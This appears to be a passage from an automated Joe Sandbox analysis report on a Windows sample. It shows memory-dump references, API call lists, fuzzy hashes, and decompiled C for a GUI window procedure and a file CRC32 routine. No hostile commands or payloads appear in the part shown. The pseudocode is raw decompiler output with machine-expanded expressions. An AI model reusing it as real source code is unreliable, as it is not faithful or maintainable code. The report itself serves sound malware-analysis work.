                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$LongPropRemove$CallDragDropNtdllProcProc_Revoke
                                                                                                                                                              • String ID: PB_DropAccept$PB_ID
                                                                                                                                                              • API String ID: 1182866496-3688647018
                                                                                                                                                              • Opcode ID: b9bfcae031c6630c6e9c092a5eb06929bf36462863c6b1a7c9fcfbf9c6ef34c6
                                                                                                                                                              • Instruction ID: 8847c1e44ce66a7f40964fadd5f5e1718d5aefc3fa063d13d1fd232dc2879c57
                                                                                                                                                              • Opcode Fuzzy Hash: b9bfcae031c6630c6e9c092a5eb06929bf36462863c6b1a7c9fcfbf9c6ef34c6
                                                                                                                                                              • Instruction Fuzzy Hash: C3118231000205BFCB02AF65DD88D6F3BB9EB867747108236F925722E1C735DC219B6A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E00407E1A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                              				_Unknown_base(*)()* _v8;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				intOrPtr* _t30;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              
                                                                                                                                                              				sprintf( &_v60, "PB_GadgetStack_%i",  *0x40b0fc);
                                                                                                                                                              				_t39 = GetPropA(_a4,  &_v60);
                                                                                                                                                              				if(_t39 == 0) {
                                                                                                                                                              					L12:
                                                                                                                                                              					return  *0x40a7b4(_a4, _a8, _a12, _a16);
                                                                                                                                                              				}
                                                                                                                                                              				_v8 =  *((intOrPtr*)(_t39 + 0x14));
                                                                                                                                                              				if(_a8 == 0x82) {
                                                                                                                                                              					_t30 = E0040642D( *0x40b428);
                                                                                                                                                              					if( *((intOrPtr*)(_t30 + 0x10)) != 0) {
                                                                                                                                                              						_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 0xc))));
                                                                                                                                                              					} else {
                                                                                                                                                              						_t38 =  *_t30;
                                                                                                                                                              					}
                                                                                                                                                              					if( *_t39 == _t38) {
                                                                                                                                                              						 *_t30 = 0;
                                                                                                                                                              						 *((intOrPtr*)(_t30 + 0x10)) = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t31 =  *(_t39 + 8);
                                                                                                                                                              					if(_t31 != 0) {
                                                                                                                                                              						HeapFree( *0x40b0f8, 0, _t31);
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree( *0x40b0f8, 0, _t39);
                                                                                                                                                              					RemovePropA(_a4,  &_v60);
                                                                                                                                                              				}
                                                                                                                                                              				if(_v8 == 0) {
                                                                                                                                                              					goto L12;
                                                                                                                                                              				} else {
                                                                                                                                                              					return CallWindowProcA(_v8, _a4, _a8, _a12, _a16);
                                                                                                                                                              				}
                                                                                                                                                              			}









                                                                                                                                                              0x00407e31
                                                                                                                                                              0x00407e46
                                                                                                                                                              0x00407e4c
                                                                                                                                                              0x00407ecb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407ed7
                                                                                                                                                              0x00407e58
                                                                                                                                                              0x00407e5b
                                                                                                                                                              0x00407e63
                                                                                                                                                              0x00407e6b
                                                                                                                                                              0x00407e74
                                                                                                                                                              0x00407e6d
                                                                                                                                                              0x00407e6d
                                                                                                                                                              0x00407e6d
                                                                                                                                                              0x00407e78
                                                                                                                                                              0x00407e7a
                                                                                                                                                              0x00407e7c
                                                                                                                                                              0x00407e7c
                                                                                                                                                              0x00407e7f
                                                                                                                                                              0x00407e8b
                                                                                                                                                              0x00407e95
                                                                                                                                                              0x00407e95
                                                                                                                                                              0x00407e9f
                                                                                                                                                              0x00407ea8
                                                                                                                                                              0x00407eae
                                                                                                                                                              0x00407eb2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407eb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407ec3

                                                                                                                                                              APIs
                                                                                                                                                              • sprintf.MSVCRT ref: 00407E31
                                                                                                                                                              • GetPropA.USER32(?,?), ref: 00407E40
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00407E95
                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 00407E9F
                                                                                                                                                              • RemovePropA.USER32(?,?), ref: 00407EA8
                                                                                                                                                              • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00407EC3
                                                                                                                                                              • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00407ED7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeapPropWindow$CallNtdllProcProc_Removesprintf
                                                                                                                                                              • String ID: PB_GadgetStack_%i
                                                                                                                                                              • API String ID: 1062891511-1190326050
                                                                                                                                                              • Opcode ID: 97b61449fdd32c1f0e1f8b47389faaa8a6c1ca6a220e715a3d7318b1351bfbad
                                                                                                                                                              • Instruction ID: cf438cc818e644c30d8d6d7832dcf279f56c8c30dc3acf8a1c3538aaa767c57c
                                                                                                                                                              • Opcode Fuzzy Hash: 97b61449fdd32c1f0e1f8b47389faaa8a6c1ca6a220e715a3d7318b1351bfbad
                                                                                                                                                              • Instruction Fuzzy Hash: 2E21397290020AFFCF119F50ED44CAA7B7AFB54344B00807AF905A6270D735AD61EB9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004056EF: GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                                                                                                                                                • Part of subcall function 004056EF: GetParent.USER32(?), ref: 00405746
                                                                                                                                                              • GetPropA.USER32(?,PB_MDI_Gadget), ref: 00405B47
                                                                                                                                                              • DefFrameProcA.USER32(?,00000000,?,?,?), ref: 00405B88
                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00405B92
                                                                                                                                                              • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00405BA8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Prop$ErrorFrameLastNtdllParentProcProc_Window
                                                                                                                                                              • String ID: PB_MDI_Gadget
                                                                                                                                                              • API String ID: 1329112550-983833826
                                                                                                                                                              • Opcode ID: a920dc6d61c317e893ad275446e30ae2ed6098b98c1468e5617982f14b082a6e
                                                                                                                                                              • Instruction ID: ade2ebb50fd92f58ae0ad3d0689d10ea9bcfa41fb33ca2ed9d154264829cb94a
                                                                                                                                                              • Opcode Fuzzy Hash: a920dc6d61c317e893ad275446e30ae2ed6098b98c1468e5617982f14b082a6e
                                                                                                                                                              • Instruction Fuzzy Hash: 8F111872901619AFDB209E449D88EBF7A7CEB45751F010037F915B22818778BC61DAAA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406960() {
                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                              				void* _t36;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				signed char* _t42;
                                                                                                                                                              				signed char* _t43;
                                                                                                                                                              				signed char* _t44;
                                                                                                                                                              				signed char* _t45;
                                                                                                                                                              				signed char* _t46;
                                                                                                                                                              				signed char* _t47;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				signed int _t94;
                                                                                                                                                              				unsigned int _t97;
                                                                                                                                                              				void* _t98;
                                                                                                                                                              				unsigned int _t100;
                                                                                                                                                              				signed int _t102;
                                                                                                                                                              				signed int _t103;
                                                                                                                                                              				void* _t106;
                                                                                                                                                              				unsigned int _t109;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              
                                                                                                                                                              				_t32 =  *(_t110 + 4);
                                                                                                                                                              				_t103 = _t102 | 0xffffffff;
                                                                                                                                                              				if(_t32 != 0) {
                                                                                                                                                              					_t50 = CreateFileA(_t32, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                                                                                              					 *(_t110 + 8) = _t50;
                                                                                                                                                              					if(_t50 != 0xffffffff) {
                                                                                                                                                              						_t36 =  *0x40b0f8; // 0x2140000
                                                                                                                                                              						_t106 = RtlAllocateHeap(_t36, 0, 0x1000);
                                                                                                                                                              						 *(_t110 + 0x10) = _t106;
                                                                                                                                                              						if(_t106 != 0) {
                                                                                                                                                              							do {
                                                                                                                                                              								ReadFile(_t50, _t106, 0x1000, _t110 + 0x20, 0);
                                                                                                                                                              								_t97 =  *(_t110 + 0x1c);
                                                                                                                                                              								_t40 = _t106;
                                                                                                                                                              								_t100 = _t97;
                                                                                                                                                              								if(_t97 >= 8) {
                                                                                                                                                              									_t109 = _t97 >> 3;
                                                                                                                                                              									do {
                                                                                                                                                              										_t42 = _t40 + 1;
                                                                                                                                                              										_t43 =  &(_t42[1]);
                                                                                                                                                              										_t44 =  &(_t43[1]);
                                                                                                                                                              										_t45 =  &(_t44[1]);
                                                                                                                                                              										_t46 =  &(_t45[1]);
                                                                                                                                                              										_t47 =  &(_t46[1]);
                                                                                                                                                              										_t94 = ((((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t45[1] & 0x000000ff ^ ((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t46[1] & 0x000000ff ^ (((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t45[1] & 0x000000ff ^ ((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                                                                                                                                              										_t40 =  &(_t47[2]);
                                                                                                                                                              										_t100 = _t100 - 8;
                                                                                                                                                              										_t109 = _t109 - 1;
                                                                                                                                                              										_t103 = _t94 >> 0x00000008 ^  *(0x4090e8 + ((_t47[1] & 0x000000ff ^ _t94) & 0x000000ff) * 4);
                                                                                                                                                              									} while (_t109 != 0);
                                                                                                                                                              									_t50 =  *(_t110 + 0x10);
                                                                                                                                                              									_t106 =  *(_t110 + 0x14);
                                                                                                                                                              								}
                                                                                                                                                              								if(_t100 != 0) {
                                                                                                                                                              									do {
                                                                                                                                                              										_t103 = _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4);
                                                                                                                                                              										_t40 = _t40 + 1;
                                                                                                                                                              										_t100 = _t100 - 1;
                                                                                                                                                              									} while (_t100 != 0);
                                                                                                                                                              								}
                                                                                                                                                              							} while (_t97 == 0x1000);
                                                                                                                                                              							_t98 =  *0x40b0f8; // 0x2140000
                                                                                                                                                              							HeapFree(_t98, 0, _t106);
                                                                                                                                                              						}
                                                                                                                                                              						CloseHandle(_t50);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return  !_t103;
                                                                                                                                                              			}






















                                                                                                                                                              0x00406960
                                                                                                                                                              0x00406968
                                                                                                                                                              0x0040696d
                                                                                                                                                              0x0040698d
                                                                                                                                                              0x00406992
                                                                                                                                                              0x00406996
                                                                                                                                                              0x0040699c
                                                                                                                                                              0x004069b0
                                                                                                                                                              0x004069b4
                                                                                                                                                              0x004069b8
                                                                                                                                                              0x004069c0
                                                                                                                                                              0x004069ce
                                                                                                                                                              0x004069d4
                                                                                                                                                              0x004069db
                                                                                                                                                              0x004069dd
                                                                                                                                                              0x004069df
                                                                                                                                                              0x004069e7
                                                                                                                                                              0x004069f0
                                                                                                                                                              0x004069fb
                                                                                                                                                              0x00406a2b
                                                                                                                                                              0x00406a3e
                                                                                                                                                              0x00406a57
                                                                                                                                                              0x00406a70
                                                                                                                                                              0x00406a87
                                                                                                                                                              0x00406a95
                                                                                                                                                              0x00406ab5
                                                                                                                                                              0x00406ab8
                                                                                                                                                              0x00406abb
                                                                                                                                                              0x00406abe
                                                                                                                                                              0x00406abe
                                                                                                                                                              0x00406ac6
                                                                                                                                                              0x00406aca
                                                                                                                                                              0x00406aca
                                                                                                                                                              0x00406ad0
                                                                                                                                                              0x00406ad2
                                                                                                                                                              0x00406ae0
                                                                                                                                                              0x00406ae7
                                                                                                                                                              0x00406aea
                                                                                                                                                              0x00406aea
                                                                                                                                                              0x00406ad2
                                                                                                                                                              0x00406aef
                                                                                                                                                              0x00406afb
                                                                                                                                                              0x00406b05
                                                                                                                                                              0x00406b0b
                                                                                                                                                              0x00406b0d
                                                                                                                                                              0x00406b13
                                                                                                                                                              0x00406b14
                                                                                                                                                              0x00406b1d

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 00406987
                                                                                                                                                              • RtlAllocateHeap.NTDLL(02140000,00000000,00001000), ref: 004069AA
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,?,?,00000000,00000000), ref: 004069CE
                                                                                                                                                              • HeapFree.KERNEL32(02140000,00000000,00000000,?,?,00000000,00000000), ref: 00406B05
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00406B0D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
